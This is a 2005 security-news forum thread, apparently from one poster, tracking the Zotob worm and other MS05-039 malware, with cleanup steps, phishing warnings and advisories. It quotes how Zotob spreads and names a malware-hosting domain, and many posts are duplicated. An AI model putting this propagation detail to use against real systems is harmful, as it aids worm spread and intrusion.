The Mytob worm has been modified to include MS05-039 exploitation. F-Secure gives this a MEDIUM RISK rating (2 of 3 on the Radar scale).
KEY LINKS
MS05-039: Zotob.A Worm – F-Secure (MEDIUM RISK)
MS05-039: Zotob.A Worm – F-Secure WEBLOG
MS05-039: Zotob.A Worm – F-Secure (MEDIUM RISK)
Zotob.A is a Mytob clone that spreads using a vulnerability in Windows Plug and Play service (MS05-039). Spreading using Plug and Play service vulnerability
The worm scans for systems vulnerable to Microsoft Windows Plug and Play service (MS05-039) through TCP/445. If the attack is successful, the worm instructs the remote computer to download and execute the worm from the attacker computer using FTP. The FTP server listens on port 33333 on all infected computers with the purpose of serving out the worm for other hosts that are being infected. The downloaded file is saved as ‘haha.exe’ on disk.urity/Bulletin/MS05-039.mspx
-
August 14, 2005 at 7:49 pm #3048567
Zotob.B – New Variant (minor differences from ?A? version)
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
A new “B“ variant has been developed and other new derivations are most likely on the way. Applying the latest Microsoft updates provides complete protection, as AV vendors could have difficulty keeping up.
Zotob.B – New Variant (minor differences from “A“ version
W32.Zotob.B is a worm that spreads using the vulnerability in Microsoft Windows Plug and Play Service (as described in Microsoft Security Bulletin MS05-039).
-
August 14, 2005 at 7:49 pm #3048566
MS05-039: New Spybot Variants are also using new exploit
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
The same MS05-039 exploit code has been found in at least two Spybot variants in addition to the two new Zotob variants launched today.
MS05-039: New Spybot Variants are also using new exploit
McAfee information on two new Spybot variants
W32.Spybot.UBH is a worm that has distributed denial of service and back door capabilities. The worm spreads by using the vulnerability in Microsoft Windows Plug and Play Service (as described in Microsoft Security Bulletin MS05-039).
-
August 14, 2005 at 11:49 pm #3048551
Zotob.B – New Variant (minor differences from ?A? version)
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
A new “B“ variant has been developed and other new derivations are most likely on the way. Applying the latest Microsoft updates provides complete protection, as AV vendors could have difficulty keeping up.
Zotob.B – New Variant (minor differences from “A“ version
W32.Zotob.B is a worm that spreads using the vulnerability in Microsoft Windows Plug and Play Service (as described in Microsoft Security Bulletin MS05-039).
-
August 15, 2005 at 3:49 am #3048524
Zotob.B – New Variant (minor differences from ?A? version)
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
A new “B“ variant has been developed and other new derivations are most likely on the way. Applying the latest Microsoft updates provides complete protection, as AV vendors could have difficulty keeping up.
Zotob.B – New Variant (minor differences from “A“ version
W32.Zotob.B is a worm that spreads using the vulnerability in Microsoft Windows Plug and Play Service (as described in Microsoft Security Bulletin MS05-039).
-
August 15, 2005 at 7:49 am #3048434
Zotob.B – New Variant (minor differences from ?A? version)
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
A new “B“ variant has been developed and other new derivations are most likely on the way. Applying the latest Microsoft updates provides complete protection, as AV vendors could have difficulty keeping up.
Zotob.B – New Variant (minor differences from “A“ version
W32.Zotob.B is a worm that spreads using the vulnerability in Microsoft Windows Plug and Play Service (as described in Microsoft Security Bulletin MS05-039).
-
August 15, 2005 at 11:49 am #3050329
Zotob.B – New Variant (minor differences from ?A? version)
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
A new “B“ variant has been developed and other new derivations are most likely on the way. Applying the latest Microsoft updates provides complete protection, as AV vendors could have difficulty keeping up.
Zotob.B – New Variant (minor differences from “A“ version
W32.Zotob.B is a worm that spreads using the vulnerability in Microsoft Windows Plug and Play Service (as described in Microsoft Security Bulletin MS05-039).
-
August 15, 2005 at 3:49 pm #3050206
Zotob.B – New Variant (minor differences from ?A? version)
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
A new “B“ variant has been developed and other new derivations are most likely on the way. Applying the latest Microsoft updates provides complete protection, as AV vendors could have difficulty keeping up.
Zotob.B – New Variant (minor differences from “A“ version
W32.Zotob.B is a worm that spreads using the vulnerability in Microsoft Windows Plug and Play Service (as described in Microsoft Security Bulletin MS05-039).
-
August 15, 2005 at 7:49 pm #3050134
Zotob.B – New Variant (minor differences from ?A? version)
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
A new “B“ variant has been developed and other new derivations are most likely on the way. Applying the latest Microsoft updates provides complete protection, as AV vendors could have difficulty keeping up.
Zotob.B – New Variant (minor differences from “A“ version
W32.Zotob.B is a worm that spreads using the vulnerability in Microsoft Windows Plug and Play Service (as described in Microsoft Security Bulletin MS05-039).
-
August 15, 2005 at 7:49 pm #3050135
MS05:039: eEye’s Free Retina UMPNP Scanner to find vulnerable computers
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
eEye’s Free Retina UMPNP Scanner – limited to 16 IP addresses
Retina UMPNP Scanner – The Retina UMPNP Scanner is a single audit scanning tool offered free of charge by eEye Digital Security. This tool will scan up to 16 IP addresses at once to determine if any are vulnerable to the Plug and Play Service vulnerability (MS05-039) released by Microsoft in August, 2005.
-
August 15, 2005 at 7:49 pm #3050136
MS05-039: FREE REMOVAL TOOL for Zotob Internet worm – Symantec
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
-
August 15, 2005 at 11:49 pm #3050119
Zotob.B – New Variant (minor differences from ?A? version)
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
A new “B“ variant has been developed and other new derivations are most likely on the way. Applying the latest Microsoft updates provides complete protection, as AV vendors could have difficulty keeping up.
Zotob.B – New Variant (minor differences from “A“ version
W32.Zotob.B is a worm that spreads using the vulnerability in Microsoft Windows Plug and Play Service (as described in Microsoft Security Bulletin MS05-039).
-
August 16, 2005 at 3:49 am #3048060
Zotob.B – New Variant (minor differences from ?A? version)
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
A new “B“ variant has been developed and other new derivations are most likely on the way. Applying the latest Microsoft updates provides complete protection, as AV vendors could have difficulty keeping up.
Zotob.B – New Variant (minor differences from “A“ version
W32.Zotob.B is a worm that spreads using the vulnerability in Microsoft Windows Plug and Play Service (as described in Microsoft Security Bulletin MS05-039).
-
August 16, 2005 at 7:49 am #3047960
Zotob.B – New Variant (minor differences from ?A? version)
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
A new “B“ variant has been developed and other new derivations are most likely on the way. Applying the latest Microsoft updates provides complete protection, as AV vendors could have difficulty keeping up.
Zotob.B – New Variant (minor differences from “A“ version
W32.Zotob.B is a worm that spreads using the vulnerability in Microsoft Windows Plug and Play Service (as described in Microsoft Security Bulletin MS05-039).
-
August 16, 2005 at 11:49 am #3047815
Zotob.B – New Variant (minor differences from ?A? version)
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
A new “B“ variant has been developed and other new derivations are most likely on the way. Applying the latest Microsoft updates provides complete protection, as AV vendors could have difficulty keeping up.
Zotob.B – New Variant (minor differences from “A“ version
W32.Zotob.B is a worm that spreads using the vulnerability in Microsoft Windows Plug and Play Service (as described in Microsoft Security Bulletin MS05-039).
-
August 16, 2005 at 12:54 pm #3047755
Zotob.B – New Variant (minor differences from ?A? version)
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
A new “B“ variant has been developed and other new derivations are most likely on the way. Applying the latest Microsoft updates provides complete protection, as AV vendors could have difficulty keeping up.
Zotob.B – New Variant (minor differences from “A“ version
W32.Zotob.B is a worm that spreads using the vulnerability in Microsoft Windows Plug and Play Service (as described in Microsoft Security Bulletin MS05-039).
-
August 16, 2005 at 8:54 pm #3049951
Zotob.B – New Variant
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
A new “B“ variant has been developed and other new derivations are most likely on the way.? Applying the latest Microsoft updates provides complete protection, as AV vendors could have difficulty keeping up.
?Zotob.B – New Variant (minor differences from “A“ version
W32.Zotob.B is a worm that spreads using the vulnerability in Microsoft Windows Plug and Play Service (as described in Microsoft Security Bulletin MS05-039).
-
August 16, 2005 at 8:54 pm #3049952
MS05-039: Zotob D variant – MEDIUM RISK at Trend & Secunia
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
The malware writers are unfortunately making improvements in the mechanisms to spread MS05-039 exploits, as Zotob “D” just went MEDIUM RISK
MS05-039: Zotob “D” variant – MEDIUM RISK at Trend & Secunia
http://secunia.com/virus_information/20725/zotob.d/ -
August 16, 2005 at 8:54 pm #3049953
MS05-039: IRCBot HIGH RISK alert
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
http://vil.mcafeesecurity.com/vil/content/v_135491.htm
This detection is for?an Internet Relay Chat (IRC)?bot?worm which includes the ability to spread by exploiting systems which are not yet patched for the MS05-039 vulnerability .?
This worm is designed to contact?a remote IRC server and wait for further instructions.
If you think that you may be infected with W32/IRCbot.worm!MS05-039, and are unsure how to check your system, you may download the Stinger tool to scan your system and remove the virus if present.? This is not required for McAfee users as McAfee products are capable of detecting and removing the virus with the latest update. (see the removal instructions below for more information).
-
August 16, 2005 at 8:54 pm #3049950
CNN: Zotob Worm strikes down Windows 2000 systems
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
CNN: Zotob Worm strikes down Windows 2000 systems
WASHINGTON (CNN) — A fast-moving computer worm Tuesday attacked computer systems using Microsoft operating systems, shutting down computers in the United States, Germany and Asia. Among those hit were offices on Capitol Hill, which is in the midst of August recess, and media organizations, including CNN, ABC and The New York Times. The Caterpillar Co. in Peoria, Illinois, reportedly also had problems.
-
August 17, 2005 at 12:54 pm #3048953
MS05-039 Cleaning infections for Windows 2000 PCs
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Below are the recommended general cleaning techniques for MS05-039 infections associated with the Windows 2000 environment. The key steps are to remove the current virus with a standalone removal tool, get Windows 2000 to Service Pack 4, and then apply the MS05-039 patch so you system is bullet-proof from current and future infections based on this specific security exposure.
1. IF NEEDED: Download Windows 2000 Service Pack 4 plus the MS04-011 patch. (this step can be skipped if user has these)
2. Download MS05-039 patch from Microsoft
3. Download McAfee’s Stinger standalone cleaning tool (which handles all major Zobot and other MS05-039 threats). Other AV and MS based standalone cleaners can be used also.
note – in steps 1-3, you may need to use another uninfected PC if they have the continuous reboot issue; also AV and Firewall protection may be gone as these worms clobber most of the popular ones. You can copy to and from a CD or USB memory stick to capture these repair tools. Stinger should fit on a diskette
4. Run McAfee’s Stinger cleaning tool (or other standalone AV or MS cleaning
tools) to remove worm infection5. IF NEEDED: Apply Windows 2000 SP4 and then reboot. Then apply the MS04-011 which provides protection against Sasser.
6. Apply the MS05-039 patch from Microsoft and reboot
7. Connect back to the Internet and run Windows Update Then update your Antivirus software. Update or add a firewall system if you need one.
8. From a lessons learned standpoint – always check at least once per month on every 2nd Tuesday for MS updates and apply them right away
-
August 19, 2005 at 12:54 pm #3066453
Internet Explorer – MSDDS Zero Day Exploit Protection
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
The Internet Storm Center went to yellow alert for a 24 hour period to highlight the need for administrators and others to take precautions and preventative actions. Vulernable versions might be found in Office versions earlier than Office 2003, or other older Microsoft products.
The MSDSS.DLL version must be higher than 7.0.9064.9112 to be considered safe. To test this, find MSDDS.DLL and check the File PROPERTIES and then check the VERSION information As I’m using Office XP, I’ve personally tested the ISC Killbit solution and so far so good.
IE Zero Day Exploit – Internet Storm Center returns to Yellow
Microsoft Security Advisory for MSDDS.DLL Issue
-
August 20, 2005 at 12:53 pm #3066261
MS05-039: Virus Writers compete in Botwars to create top variant
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
About a year ago, the authors of Netsky/Bagle/MyDoom virus variants were engaged in a “virus war“ where they deleted existing copies of competing viruses when infecting a suseptible PC. Similarly, the virus writers who have created Zobot, Bozori, IRCBot, and other MS05-039 variants have in a competitive effort to be the top worm creating MS05-039 based infections.
F-Secure Weblog: August 17, 2005 “This is not a viruswar, this is a botwar!”
QUOTE: Here is a status update on the malware using the Plug-and-Play vulnerability (MS05-039). For the last four days we got 11 different samples of malware using this vulnerability. Currently there are three Zotob variants (.A, .B and .C), one Rbot (.YK), one Sdbot (.ADB), one CodBot, three IRCbots (.ES, .ET and .EX) and two variants of Bozori (.A, .B).
Variants from both IRCBot and Bozori families are deleting competing PnP bots. It seems there are two groups that are fighting: IRCBot and Bozori vs Zotobs and the other Bots.
See our high-tech illustration for details.
-
August 20, 2005 at 12:53 pm #3066262
MS05-039: Great blog link summarizing Zotob virus developments
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Dominic White’s blog entry provides an excellent summary of MS05-039 developments:
-
August 21, 2005 at 12:54 am #3068330
Internet Explorer – MSDDS Zero Day Exploit additional links
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
F-Secure provides an updated list of links related to the MSDDS exploit.
The Msdds.dll component is not installed by default with Windows, but might come with several other Microsoft applications. A vulnerability on it allows for malicious exploitation upon visiting a website.
The following links provide extended information:
Internet Storm Center
Secunia
FrSIRT
SecurityFocus
SecurityTracker
ISS
US-CERT
Microsoft advisory -
August 24, 2005 at 8:54 am #3068140
Microsoft HoneyMonkey Project – designed to find malicious websites
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Microsoft is initiating a new campaign to search for malicious websites with it’s new HoneyMonkey project.
QUOTE: Strider HoneyMonkey is a Microsoft Research project to detect and analyze Web sites hosting malicious code. The intent is to help stop attacks that use Web servers to exploit unpatched browser vulnerabilities and install malware on the PCs of unsuspecting users. Such attacks have become one of the most vexing issues confronting Internet security experts. Strider HoneyMonkey is a project of the Cybersecurity and Systems Management group in Microsoft Research.
- Understanding HoneyMonkey
- Full research technical report on Strider HoneyMonkey
- MSR Cybersecurity and Systems Management Group
-
August 24, 2005 at 8:54 am #3068141
Apple Macintosh OS X – Security Update 2005-007
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Apple released it’s seventh security update for the OS/X operating system last week. This update protects the operating system and supporting products. This update provides protection from buffer overflows, arbitrary code execution, and other security vulnerabilities. Macintosh users should quickly patch their systems to ensure the greatest level of protection.
Apple OS X patches released last week
http://isc.sans.org/diary.php?date=2005-08-18Apple OS X – Security Update 2005-007
http://docs.info.apple.com/article.html?artnum=302163 -
August 24, 2005 at 12:54 pm #3068069
CyberMules — Crooks lure citizens into international crime
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
That was a fascinating read, as I also learned more about the “dark side of the force”. It’s clear that it’s still too easy to get credit on a fraudulent basis. It also affirms that ads promoting work-at-home opportunities should be carefully reviewed.
-
August 25, 2005 at 12:54 pm #3056134
MS05-039 Worms: XP SP1 with lowered security settings can be vulnerable
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Microsoft has issued a new advisory that Windows XP SP1 PCs with lowered security settings are also vulnerable to MS05-039 worm attacks similar to the ones that hit Windows 2000 systems. The Forced Guest account and open file sharing increase security risks anyway and they allow the worm to infect XP systems which were thought to be safe from this W/2000 based attack. Microsoft noted that these particular settings are not often used.
Microsoft Security Advisory (906574) – Clarification of Simple File Sharing and ForceGuest
Microsoft has issued this Security Advisory to clarify information of the issue addressed in Security Bulletin MS05-039 for non-default configurations of Windows XP Service Pack 1. This feature is known as “Simple File Sharing and ForceGuest.”
If you are using Windows XP Service Pack 2, enabling Simple File Sharing and ForceGuest does not increase your level of exposure to the MS05-039 security vulnerability. Also, customers that have applied the security update included with MS05-039 are not impacted by this issue.
We recommend that customers continue to follow our Protect Your PC guidance of enabling a firewall, getting software updates and installing ant-virus software. Customers can learn more about these steps by visiting the Protect Your PC Web site.
-
August 25, 2005 at 2:15 pm #3056076
MS05-039 Bozori worm – Rise of the business worm?
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
The MS05-039 based Bozori worm impacted a number of major businesses yet it didn’t impact Internet users as extensively as the Blaster and Sasser worm did in 2003 and 2004 respectively. This most likely is due to the vulnerability being in W/2000 and the random IP generation design which might make it spread faster on the inside of the network. Kaspersky in this article discusses the potential for virus writers to target vulnerable businesses who may have difficulty keeping up each month with security patches.
MS05-039 Bozori worm – Rise of the business worm?
QUOTES: There’s no question that this worm is spreading. However, it seems to be confined to localized ‘explosions’ inside large corporations. These organizations, typically made up of ‘small internets’ behind heavily defended Internet gateways, have experienced infection.
The Bozori incident suggests that we’re on the threshold of a new era, in which ‘business worms’ will cause ‘local network outbreaks’ in large corporations, but will have little effect on the Internet as a whole.
-
August 25, 2005 at 2:15 pm #3056075
Unixwiz.net Tech Tip: An Illustrated Guide to IPSec
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
This is an awesome resource for understanding the technical architecture of the IPSec environment from a very talented Microsoft MVP.
Unixwiz.net Tech Tip: An Illustrated Guide to IPSec
QUOTE: IPSec is a suite of protocols for securing network connections, but the details and many variations quickly become overwhelming. This is particularly the case when trying to interoperate between disparate systems, causing more than one engineer to just mindlessly turn the knobs when attempting to bring up a new connection.
-
August 26, 2005 at 2:15 pm #3053775
MSRC: Inside Microsoft’s Zotob Situation Room
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
A neat “behind the scenes” of what MSRC was doing during the MS05-039 worm attacks:
MSRC: Inside Microsoft’s Zotob Situation Room
QUOTE: In the wee hours of Sunday morning, an enterprise customer contacted the MSRC with the first positive identification of what would become the Zotob attack. Toulouse declined to name the customer.
“They came to us with a sample of a new attack that they believed was exploiting the Plug and Play vulnerability,” he said. “We took the code and started our own investigation. We also passed it to our VIA [Virus Information Alliance] partners to make sure everyone can get their signatures updated to provide protection.”
The MSRC’s investigation confirmed that an actual attack exploiting MS05-039 was under way and would only get worse.
“Early Sunday morning, our investigators tell us to get started on our process. We weren’t seeing a widespread attack, and the anti-virus vendors weren’t seeing anything major yet. But, with everything we knew, we decided to activate our security response process.”
By 10 a.m. Sunday, pagers started buzzing. The Situation Room was set up in Building 27 at Microsoft’s Redmond campus.
….
-
August 26, 2005 at 2:15 pm #3053776
Two Arrests have been made related to Zotob worm
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
-
August 26, 2005 at 2:15 pm #3053777
Windows Registry – Nasty Games of Hide & Seek
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
For the past 2 days, the Internet Storm Center (ISC) shared a warning on long registry key values that can be made hidden from REGEDIT by malware making removal more complicated than in the past.
The ISC is offering a free Registry Search Tool. This neat new tool will locate the registry key values greater than 255 characters in length.
Windows Registry – Nasty Games of Hide & Seek
http://isc.sans.org/diary.php?date=2005-08-24
http://isc.sans.org/diary.php?date=2005-08-25ISC Registry Search tool — locates long key values
http://isc.sans.org/LVNSearch.exeQUOTE: We have started to see some possible reports of malware which utilizes this concealment technique in the wild. Products that have been reported to be able to query/report/delete/etc these keys:
AppSense Environment Manager
HiJackThis v1.99.1 (SCAN function)
HiJackThis v1.99.2 (in development)
Stillsecure SafeAccess
Sysinternals Autoruns (mixed reports)
Regedt32 (Win2k) -
August 27, 2005 at 10:15 pm #3053628
Article: Potential for Destructive PC Microcode or BIOS Virus
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
The attached article discusses the potential for microcode based viruses that could potentially flash the BIOS and make the PC completely unusable. This type of attack occurred on a limited basis in 1998 with the CIH virus and here’s hoping this type of highly destructive attack won’t be forthcoming.
Article: Potential for Destructive PC Microcode or BIOS Virus
Awaiting the PC Killers
AUGUST 22, 2005 (COMPUTERWORLD) – The malicious code enters your network undetected, rapidly infecting more than 100 machines. But this is no ordinary virus. Your antivirus and disk recovery tools can’t help, because the disk drives won’t spin up at all. The drives are toast. The PCs are completely inoperable. The era of microcode attacks has begun.
Could viruses really attack the low-level microcode that makes disk drives run? It’s entirely possible, disk technology experts say. Dimitri Postrigan knows how such a virus might be created — but he’s not telling. Postrigan reverse-engineers and programs hard disk drives at ActionFront Data Recovery Labs.
He says each disk drive has its own internal operating system that enables the device to start up. The operating system microcode resides in a special system area of the disk. “A virus could be written which would destroy the whole system area on a drive. This will make the drive and data almost unrecoverable,” Postrigan says.
-
August 28, 2005 at 6:15 am #3054886
F-Secure reports 1st Medium-scale phone virus infection
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Viruses are new to mobile phone technology and they are some circulating in-the-wild. To date most infections have been with single individuals becoming infected. F-Secure briefly documents how a company’s address book is most likely used to spread this to dozens of individuals in a company. At least 20 true infections resulted that required cleaning and removal of the mobile phone virus.
F-Secure reports 1st Medium-scale phone virus infection
Commwarrior incident – F-Secure Weblog
August 27, 2005 — We’ve now seen the first medium-scale internal infection of a company that was caused by a mobile virus. On Wednesday this week, we were working on a case where a single company had a serious run-in with the Commwarrior.B virus. Several dozens of employees of the company received Bluetooth or MMS transmission of the virus during the day-long outbreak and over twenty of them actually opened the message on their phones and got infected with it.
-
August 31, 2005 at 2:15 pm #3055465
Phishing Attacks – More extensive than usual today
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Since 2000, I’ve been using Yahoo’s free email facilities, as they offer integrated Norton Anti-virus and excellent SPAM protection controls to complement my use of corporate McAfee VS 8.0i. I recieve a number of virus infected emails, phishing attacks, and spam daily.
Today, I received a large number of repetitive phishing messages that appear to be from PayPal, requesting that I update and verify my account information, even though I don’t have an account established. It’s always important to pay attention to email messages as they can appear legitimate and you can enter information that may be used for identity theft or fraud.
update@paypal.com – Update and Verify Your PayPal account*** Wed 08/31 8k
update@paypal.com – Update and Verify Your PayPal account*** Wed 08/31 8k
update@paypal.com – Update and Verify Your PayPal account*** Wed 08/31 8k
update@paypal.com – Update and Verify Your PayPal account*** Wed 08/31 8k
update@paypal.com – Update and Verify Your PayPal account*** Wed 08/31 8k
update@paypal.com – Update and Verify Your PayPal account*** Wed 08/31 8k
update@paypal.com – Update and Verify Your PayPal account*** Wed 08/31 8k
update@paypal.com – Update and Verify Your PayPal account*** Wed 08/31 8k
update@paypal.com – Update and Verify Your PayPal account*** Wed 08/31 8k -
September 1, 2005 at 6:15 am #3055303
ISC Warning: Please give carefully to Hurricane Katrina relief funds
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Please donate carefully through trusted sources such as the Red Cross, church organizations, or other reputable agencies. There are a number of fake emails and websites that have surfaced which capture your credit card information and transfer funds, but to criminals and not the intended victims. Additionally, information shared in these untrusted websites could be used for identity theft purposes.
ISC Warning: Please give carefully to Hurricane Katrina relief funds
Google: Katrina Phishing Scam Warnings
QUOTE: We decided to start a new diary today, regarding the fake domains for donations to the Katrina Hurricanes victims. We updated yesterday´s diary with the information of fake emails and domains being used to get donations for the Katrina Hurricane and Brian Krebs just updated the Security Fix blog, with new informations about these fake domains. Some that we strongly suspect so far are katrinahelp.com , katrinarelief.com and katrinacleanup.com.
Please donate to only trusted sites where you have assurances your contributions will go toward helping victims of this major trajegdy . Below is a link to the American Red Cross.
-
September 2, 2005 at 10:15 am #3055065
Katrina Malware – Trojan-Downloader.JS.Small.bq is at this website
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Be careful with website links in email messages. It’s a best practice to never click on a URL even to opt out of spam unless you are sure it can be trusted. This breaking news story from an email message spammed to numerous individuals contains a hostile link that will download malware from the website to PCs that visit it.
Katrina Malware – Trojan-Downloader.JS.Small.bq is at this website
F-Secure – September 1st Weblog identifies this new downloader trojan horse
Subject: Re: Katrina killed as many as 80 people.
Just before daybreak Tuesday, Katrina, now a tropical storm, was 35 miles northeast of Tupelo, Miss., moving north-northeast with winds of 50 mph. Forecasters at the National Hurricane Center said the amount of rainfall has been adjusted downward Monday. Mississippi Gov. Haley Barbour said Tuesday that Hurricane Katrina killed as many as 80 people in his state and burst levees in Louisiana flooded New Orleans. Read More
The Read More.. links to “nextermest . com” [DO NOT VISIT THIS SITE as Trojan-Downloader.JS.Small.bq is at this website]. It uses obfuscated javascript to download what looks like a .hta exploit.
-
September 2, 2005 at 10:15 am #3055064
Dameware Remote Control – Buffer Overflow & POC warnings from FrSIRT
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Corporate Users of the Dameware remote control facility should patch their systems expediently as a new vulnerability and proof-of-concept code were published at the end of August.
Dameware Remote Control – Buffer Overflow Expoit Warning
Dameware Remote Control – Proof of Concept Exploit (be careful as actual code for the exploit is published here)
Solution: Upgrade to DameWare Mini Remote Control version 4.9.2.4
QUOTE: A vulnerability was identified in DameWare Mini Remote Control Server, which could be exploited by remote attackers to execute arbitrary commands. This flaw is due to a buffer overflow error in the authentication procedure that does not properly handle an overly long “username” parameter (port 6129), which could be exploited by unauthenticated remote attackers to compromise a vulnerable system.
By default (DameWare Remote Control Server) DWRCS listens on port 6129 TCP. An attacker can construct a specialy crafted packet and exploit this vulnerability. The vulnerability is caused by insecure calls to the lstrcpyA function when checking the username.
-
September 3, 2005 at 10:15 am #3054222
ISC email Hoax warning: Gas shortage hoax
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
http://isc.sans.org/diary.php?date=2005-09-02
There is a hoax e-mail making the rounds about a gas shortage. Don’t run out and create a shortage. And now, we have reports from one of our readers (thanx, Rikki) who is seeing e-mails about a gas shortage floating around. The facts are, yes, there have been gas stations that have run out of gasoline. That is mostly because people have flocked to them to fill up fearing a shortage (can you say self-fulfilling prophecy?). Yes, some refining capacity in the US has been impacted by the hurricane, but we won’t know the impact of that for some time yet. In the meantime, there is gasoline available in the US, and stations are still getting deliveries. Yes, the prices have gone up and conserving would be a good idea, but there is no evidence of an imminent widespread shortage outside of the areas that suffered direct infrastructure damage earlier this week. Remain calm.
-
September 3, 2005 at 6:15 pm #3054182
Windows XP SP2 – Windows Firewall update available
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Microsoft has released a new update. This update applies to Microsoft Windows XP Service Pack 2 (SP2) or Microsoft Windows Server 2003 Service Pack 1 (SP1). This patch fixes a condition where an exception may not show up in the Windows Firewall GUI, if this exception is created by modifying the registry directly. In order to do this, administrative priveleges are required on the box. The danger in this flaw is that a hacker could open a backdoor that would not be shown in the GUI Firewall ruleset.
-
September 6, 2005 at 6:15 pm #3064796
MS05-039: Spybot.WOE exploits 4 unpatched MS vulnerabilities
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
A new variant of Spybot has emerged which exploits four unpatched Microsoft vulnerabilities which must be patched on all PCs to ensure the best levels of protection.
W32.Spybot.WOE is a worm with back door capabilities that can be used to launch a distributed denial of service attack. The worm spreads by exploiting numerous vulnerabilities, including the Microsoft Windows Plug and Play Buffer Overflow Vulnerability (as described in Microsoft Security Bulletin MS05-039).
Firewall protection: The following are TCP ports that should be protected in the firewall for the PC or server: 139, 445, 1427, 4654, 65528, 65529.
Microsoft Security Exploits: Spreads by scanning TCP ports 139 and 445, and exploiting the following vulnerabilities:
- The Microsoft Windows Plug and Play Buffer Overflow Vulnerability (as described in Microsoft Security Bulletin MS05-039).
- The Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability (as described in Microsoft Security Bulletin MS03-026).
- The Microsoft Windows Local Security Authority Service Remote Buffer Overflow(as described in Microsoft Security Bulletin MS04-011).
- The Microsoft Windows ASN.1 Library Bit String Processing Variant Heap Corruption Vulnerability (as described in Microsoft Security Bulletin MS04-007).
-
September 7, 2005 at 2:15 pm #3064437
Kaspersky Labs: Watch for $9.95 charges on your credit cards
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
Kaspersky Labs documents a freshly launched fraud attack where the scammers use low monetary values in an attempt to go unnoticed.
Are you $9.95 out of pocket? – September 7, 2005 weblog entry
http://www.viruslist.com/en/weblog?calendar=2005-09QUOTE: Next to the more or less daily scams mentioned in the previous post, we’re seeing a resurgence in another scamming tactic. Over the last couple of weeks more people are reporting charges of $9.95 to their credit cards – for no reason whatsoever. About a year ago we saw a similar trend and now it has been picked up again.
The scammers hope that because the amount of money is so small, the charge will go unnoticed. They’re also using names which closely resemble real company names to make the charges look (at first glance) more legitimate. So be sure to check your accounts for odd charges on a regular basis.
-
September 8, 2005 at 6:14 pm #3063989
Sept 13, 2005 – Microsoft Security Bulletins Preview
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
Here’s hoping the bad guys can’t reengineer the critical bulletin that’s forthcoming in September as we need a break after MS05-039 in August
Title: September 2005 Microsoft Security Response Center Bulletin Notification
Issued: September 8, 2005
On 13 September 2005 Microsoft is planning to release:
Security Updates – One Microsoft Security Bulletin affecting Microsoft Windows. The highest Maximum Severity rating for this is critical. These updates may require a restart. These updates will be detectable using the Microsoft Baseline Security Analyzer (MBSA).
Microsoft Windows Malicious Software Removal Tool – Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services and the Download Center.
Non-security High Priority updates on MU, WU, WSUS and SUS – Microsoft will release one NON-SECURITY High-Priority Updates for Windows on Microsoft Update (MU), Windows Update (WU), Windows Server Update Services (WSUS) and Software Update Services (SUS).
Although we do not anticipate any changes, the number of bulletins, products affected, restart information and severities are subject to change until released.
-
September 9, 2005 at 10:15 am #3063783
Mozilla Firefox – Critical Security Warning for all versions
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
